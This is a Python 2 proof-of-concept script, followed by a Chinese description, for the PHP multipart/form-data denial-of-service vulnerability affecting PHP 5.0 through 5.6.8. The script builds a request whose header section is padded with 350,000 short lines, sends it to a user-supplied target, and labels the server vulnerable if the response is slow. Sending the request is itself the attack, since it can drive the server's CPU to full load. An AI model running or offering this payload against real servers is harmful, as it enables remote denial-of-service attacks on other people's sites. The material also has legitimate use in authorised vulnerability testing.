import sys
import urllib,urllib2
import datetime
from optparse import OptionParser
def http_proxy(proxy_url):
proxy_handler = urllib2.ProxyHandler({"http" : proxy_url})
null_proxy_handler = urllib2.ProxyHandler({})
opener = urllib2.build_opener(proxy_handler)
urllib2.install_opener(opener)
#end http_proxy
def check_php_multipartform_dos(url,post_body,headers):
req = urllib2.Request(url)
for key in headers.keys():
req.add_header(key,headers[key])
starttime = datetime.datetime.now();
fd = urllib2.urlopen(req,post_body)
html = fd.read()
endtime = datetime.datetime.now()
usetime=(endtime - starttime).seconds
if(usetime > 5):
result = url+" is vulnerable";
else:
if(usetime > 3):
result = "need to check normal respond time"
return [result,usetime]
#end
def main():
#http_proxy("http://127.0.0.1:8089")
parser = OptionParser()
parser.add_option("-t", "--target", action="store",
dest="target",
default=False,
type="string",
help="test target")
(options, args) = parser.parse_args()
if(options.target):
target = options.target
else:
return;
Num=350000
headers={'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryX3B7rDMPcQlzmJE1',
'Accept-Encoding':'gzip, deflate',
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.111 Safari/537.36'}
body =
"------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition:
form-data; name=\"file\"; filename=sp.jpg"
payload=""
for i in range(0,Num):
payload = payload + "a\n"
body = body + payload;
body = body +
"Content-Type: application/octet-stream\r\n\r\ndatadata\r\n------
WebKitFormBoundaryX3B7rDMPcQlzmJE1--"
print "starting...";
respond=check_php_multipartform_dos(target,body,headers)
print "Result : "
print respond[0]
print "Respond time : "+str(respond[1]) + " seconds";
if __name__=="__main__":
main()
PHP 在处理HTTP请求中的multipart/form-data头部数据时存在一个安全漏洞,导致PHP大量重复分配和拷贝内存的操作,可能造成CPU资源占用100%并持续较长时间,这可能造成远程拒绝服务攻击。受影响的软件及系统:PHP 5.0.0 - 5.0.5;PHP 5.1.0 - 5.1.6;PHP 5.2.0 - 5.2.17;PHP 5.3.0 - 5.3.29;PHP 5.4.0 - 5.4.40;PHP 5.5.0 - 5.5.24;PHP 5.6.0 - 5.6.8